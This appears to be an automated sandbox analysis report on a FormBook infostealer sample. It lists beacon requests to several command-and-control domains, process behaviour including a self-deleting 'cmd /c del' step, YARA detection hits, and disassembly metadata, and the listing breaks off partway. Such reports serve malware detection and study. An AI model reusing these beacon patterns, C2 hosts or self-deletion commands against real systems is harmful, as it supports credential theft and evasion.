                                          • www.sakina.digital
                                          • www.ninetofivetheses.com
                                          • www.privatelymeeting.com

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.4 | 49815 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:57:43.803239107 CEST | 8110 | OUT | GET /shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3 HTTP/1.1
                                          Host: www.hartfulcleaning.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:57:43.903879881 CEST | 8111 | IN | HTTP/1.1 301 Moved Permanently
                                          Date: Sun, 03 Oct 2021 07:57:43 GMT
                                          Content-Length: 0
                                          Connection: close
                                          location: https://www.hartfulcleaning.com/shjn?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3
                                          strict-transport-security: max-age=120
                                          x-wix-request-id: 1633247863.819246588398126726
                                          Age: 0
                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVh8VTPOV0MzZjJizkRQ/qjD,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRaltZvo+9TobxsT5eVCdjGCQw1L1DUQeOVBnHJjDsALjW9C5pgEgJzARPPe1194hBnp6ONazVZfmanRIUStwnThmc=,2UNV7KOq4oGjA5+PKsX47DroW4/3ETklcOkoKiqVN25YgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,m7d0zj9X6FBqkyAIyh66vErLMFr5x66tSJCN7L0bVuJNG+KuK+VIZfbNzHJu0vJu,k4IrXgMmYJ2VF1cp9wAw77VG8YCN6gshiXCVhknPuz4D/Bm8UpHKg9klDMJbTqmHWIHlCalF7YnfvOr2cMPpyw==
                                          Cache-Control: no-cache
                                          X-Content-Type-Options: nosniff
                                          Server: Pepyaka/1.19.10


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.4 | 49824 | 46.38.243.234 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:57:57.425302982 CEST | 8913 | OUT | GET /shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3 HTTP/1.1
                                          Host: www.qumpan.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:57:57.448713064 CEST | 8913 | IN | HTTP/1.1 404 Not Found
                                          Date: Sun, 03 Oct 2021 07:56:54 GMT
                                          Server: Apache/2.4.10 (Debian)
                                          Content-Length: 276
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.qumpan.com Port 80</address></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.4 | 49827 | 156.225.2.209 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:58:03.137198925 CEST | 8997 | OUT | GET /shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3 HTTP/1.1
                                          Host: www.2ed58fwec.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:03.475264072 CEST | 8997 | IN | HTTP/1.1 302 Redirect
                                          Content-Type: text/html; charset=UTF-8
                                          Location: https://www.2ed58fwec.xyz/shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3
                                          Server: Microsoft-IIS/8.5
                                          X-Powered-By: ASP.NET
                                          Date: Sun, 03 Oct 2021 07:57:58 GMT
                                          Connection: close
                                          Content-Length: 246
                                          Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://www.2ed58fwec.xyz/shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&amp;jlW=5jIhet3"></a></body>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.4 | 49828 | 81.88.48.71 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:58:08.583885908 CEST | 8999 | OUT | GET /shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet3 HTTP/1.1
                                          Host: www.factechcolombia.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:08.634010077 CEST | 8999 | IN | HTTP/1.1 404 Not Found
                                          Date: Sun, 03 Oct 2021 07:58:08 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shjn/ was not found on this server.</p></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.4 | 49840 | 81.169.145.74 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:58:18.735333920 CEST | 9038 | OUT | GET /shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet3 HTTP/1.1
                                          Host: www.sakina.digital
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:18.762326956 CEST | 9038 | IN | HTTP/1.1 404 Not Found
                                          Date: Sun, 03 Oct 2021 07:58:18 GMT
                                          Server: Apache/2.4.49 (Unix)
                                          Content-Length: 196
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          5 | 192.168.2.4 | 49844 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:58:23.816284895 CEST | 9050 | OUT | GET /shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet3 HTTP/1.1
                                          Host: www.ninetofivetheses.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:23.928077936 CEST | 9050 | IN | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Sun, 03 Oct 2021 07:58:23 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "615764fb-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          6 | 192.168.2.4 | 49845 | 213.186.33.5 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 3, 2021 09:58:29.019432068 CEST | 9051 | OUT | GET /shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3 HTTP/1.1
                                          Host: www.privatelymeeting.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:29.046505928 CEST | 9052 | IN | HTTP/1.1 301 Moved Permanently
                                          server: nginx
                                          date: Sun, 03 Oct 2021 07:58:29 GMT
                                          content-type: text/html
                                          content-length: 162
                                          location: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3
                                          x-iplb-request-id: 66818F39:C2B5_D5BA2105:0050_615962A5_2A4BC799:CEDD
                                          x-iplb-instance: 16976
                                          set-cookie: SERVERID77446=200172|YVliq|YVliq; path=/; HttpOnly
                                          cache-control: private
                                          connection: close
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                          Code Manipulations

                                          System Behavior

                                          General

                                          Start time:09:56:26
                                          Start date:03/10/2021
                                          Path:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\OApfyh3Vfm.exe'
                                          Imagebase:0x290000
                                          File size:536576 bytes
                                          MD5 hash:015D157C73A9A51F0A3745A028D3ABCE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:09:56:30
                                          Start date:03/10/2021
                                          Path:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          Imagebase:0x620000
                                          File size:536576 bytes
                                          MD5 hash:015D157C73A9A51F0A3745A028D3ABCE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:09:56:31
                                          Start date:03/10/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:09:56:53
                                          Start date:03/10/2021
                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Imagebase:0x830000
                                          File size:32768 bytes
                                          MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:09:56:58
                                          Start date:03/10/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:09:56:58
                                          Start date:03/10/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                            Executed Functions

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 637c0a435b412f3203a15b41b8a14a9d7cc5e5e4c1532aafeed2237d7d7b1005
                                            • Instruction ID: e371db6546d4e92a17a1151c9c3040d14a4ca795c5bdeb13381c801e02ea8b61
                                            • Opcode Fuzzy Hash: 637c0a435b412f3203a15b41b8a14a9d7cc5e5e4c1532aafeed2237d7d7b1005
                                            • Instruction Fuzzy Hash: CFA1E374D05209CFEB14CFAAC488AEEFBF2BF49324F14902AD809A7245DB749985DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B710
                                            • GetCurrentThread.KERNEL32 ref: 00C7B74D
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B78A
                                            • GetCurrentThreadId.KERNEL32 ref: 00C7B7E3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 848fee89d5139c8892e51dd19d79e5110ae3a2fa2956e00f23d41e7afb5dcea5
                                            • Instruction ID: 6b7378240d7dc06b3f530d8d3fd99096992323ac8cd8786baaa5daa2a4c41114
                                            • Opcode Fuzzy Hash: 848fee89d5139c8892e51dd19d79e5110ae3a2fa2956e00f23d41e7afb5dcea5
                                            • Instruction Fuzzy Hash: 8B5153B09006498FDB14CFAAD589BEEBBF0BF88314F24845AE419A7360CB749944CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B710
                                            • GetCurrentThread.KERNEL32 ref: 00C7B74D
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B78A
                                            • GetCurrentThreadId.KERNEL32 ref: 00C7B7E3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: d0d61db898719625c1e7f36fcd2624b7398c26c3ae52b339e9ae63a4622458b3
                                            • Instruction ID: c289e4fef644666403e576815fa6eaeb5abb24236d4347686aa816cea50fedbf
                                            • Opcode Fuzzy Hash: d0d61db898719625c1e7f36fcd2624b7398c26c3ae52b339e9ae63a4622458b3
                                            • Instruction Fuzzy Hash: 625142B0D006498FDB14CFAAD589BEEBBF0BF88314F248459E419A7360CB74A944CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C798F6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: b52b9a1e557d78f7895da383b85ee501ea8514328652630171e1b3e26a632724
                                            • Instruction ID: 34cef937233e38754b29a7764c81fa2f638d71a76ca06297f0f2fb4908d372cd
                                            • Opcode Fuzzy Hash: b52b9a1e557d78f7895da383b85ee501ea8514328652630171e1b3e26a632724
                                            • Instruction Fuzzy Hash: 23812370A00B058FDB24DF2AD04579ABBF1FF88304F108A2ED49ADBA50DB75E9058B91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C7FE2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: ddbe2428a8806369cac3d907fc495b82554beec25ece95af9773ee6189d3716a
                                            • Instruction ID: 2b5a5c2f2a42b676a089eedea1d28f3c3a90969f94d0f1c594be41b270b6d0b8
                                            • Opcode Fuzzy Hash: ddbe2428a8806369cac3d907fc495b82554beec25ece95af9773ee6189d3716a
                                            • Instruction Fuzzy Hash: 8851C2B1D003489FDB14CFAAD884ADEBBB5BF48314F24812EE419AB251D7749946CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C7FE2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 866c1b3f218179fbca455837d9037bfc82504fe084d0765ef71722e4c80582b9
                                            • Instruction ID: 6951a80731543abad75f37892ffd051ac91f4a52b0e3c3fa33abbddddb018343
                                            • Opcode Fuzzy Hash: 866c1b3f218179fbca455837d9037bfc82504fe084d0765ef71722e4c80582b9
                                            • Instruction Fuzzy Hash: E44191B1D00309DFDB14CFAAD884ADEBBB5BF48314F24812EE419AB251D7749945CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00C75429
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 68b661b69ea199cb543f6b0fb98d5b40e12ecb3d8098259f858a86f0ad1d3329
                                            • Instruction ID: 8894bfaf4c39618443be9be4ae51c0e2be2538f34163b48ae69b1b960fe9ea84
                                            • Opcode Fuzzy Hash: 68b661b69ea199cb543f6b0fb98d5b40e12ecb3d8098259f858a86f0ad1d3329
                                            • Instruction Fuzzy Hash: 5B41F371D04618CFDB24CFAAC8847DEBBB5BF88304F25806AD419AB251DB755946CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00C75429
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 3c2fdd790d2d0099b0f47971546c33fa5dedc5d02f700856f18c542700247266
                                            • Instruction ID: 9a496b43720fa3e0da71b7edecdc7c0cb713eec59540ba870b5b94c0c9d7a48c
                                            • Opcode Fuzzy Hash: 3c2fdd790d2d0099b0f47971546c33fa5dedc5d02f700856f18c542700247266
                                            • Instruction Fuzzy Hash: 6341F1B0C0461CCBDB24CFAAC884BDEBBF5BF48304F258069D519AB251DBB56945CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C798F6
                                              • Part of subcall function 00C792C8: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C79971,00000800,00000000,00000000), ref: 00C79B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: HandleLibraryLoadModule
                                            • String ID:
                                            • API String ID: 4133054770-0
                                            • Opcode ID: fbbf2374226afa5d98522408cd290b0ff34351938560a3eea032487f4d37a6c4
                                            • Instruction ID: bfaf21de63123d6c92da18064494a811bcc45c16b97ae0cc8cd82dd6eeb739bc
                                            • Opcode Fuzzy Hash: fbbf2374226afa5d98522408cd290b0ff34351938560a3eea032487f4d37a6c4
                                            • Instruction Fuzzy Hash: B321E471A042449FDB10DBA9E8407EABBB5EF86320F14846ED55DE7252CA35980ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C7B95F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: fd5cd4b9e10c7d0efa4332b17c6951c88da4889088de72dd3e39663473eca9bc
                                            • Instruction ID: fff84c7accb3b535b3238e62916735f0fb513c73f9b7153189b5942ac4d8cb49
                                            • Opcode Fuzzy Hash: fd5cd4b9e10c7d0efa4332b17c6951c88da4889088de72dd3e39663473eca9bc
                                            • Instruction Fuzzy Hash: A321E3B5900248AFDB10CFA9E584AEEBBF4EB48324F24801AE954B7350C778A945CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C7B95F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: ff6f2c2d291fdfe5101b0a2503ff9b1ca1caf974ebfbddcd5b30d6328e43ec28
                                            • Instruction ID: c17db933c720abbcad9e9e68f424c724be0cb57d0f1b5e2e4d01d5b5fff059f7
                                            • Opcode Fuzzy Hash: ff6f2c2d291fdfe5101b0a2503ff9b1ca1caf974ebfbddcd5b30d6328e43ec28
                                            • Instruction Fuzzy Hash: 3321C4B5900259EFDB10CFA9D984ADEBBF8FB48324F14841AE954B3350D774A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C79971,00000800,00000000,00000000), ref: 00C79B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: af7c8718c0b551b8de6f57b2c1b810cb227a604178c80dc192e5e10071ace66e
                                            • Instruction ID: 4a00f4f8f1c35a91d806005c269b6bb951f8fdd34255665ccbd7b9e81b9cbd95
                                            • Opcode Fuzzy Hash: af7c8718c0b551b8de6f57b2c1b810cb227a604178c80dc192e5e10071ace66e
                                            • Instruction Fuzzy Hash: A21103B29002488FCB20CF9AD444ADEBBF8EB88324F14842EE519A7200C774A945CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C79971,00000800,00000000,00000000), ref: 00C79B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 0753ce9433f4a552514ef0c5ff8e48adcc001b97620eaf912b7c1934ccf0d8d3
                                            • Instruction ID: 9d1975474a5de48e4c02f34cb09a77d319f1c9651047bbb31fca55f387f55131
                                            • Opcode Fuzzy Hash: 0753ce9433f4a552514ef0c5ff8e48adcc001b97620eaf912b7c1934ccf0d8d3
                                            • Instruction Fuzzy Hash: 791106B29002498FDB20CFAAD444ADEFBF4EB88324F14841ED459A7600C778A546CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C798F6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 196ca1419d573df5616a5a3514185f98006011437ada7086351b75623ed0c4b5
                                            • Instruction ID: 447f8bba8b225f188043621b38180531a9577fd75c8469a34180881d4eecf7ee
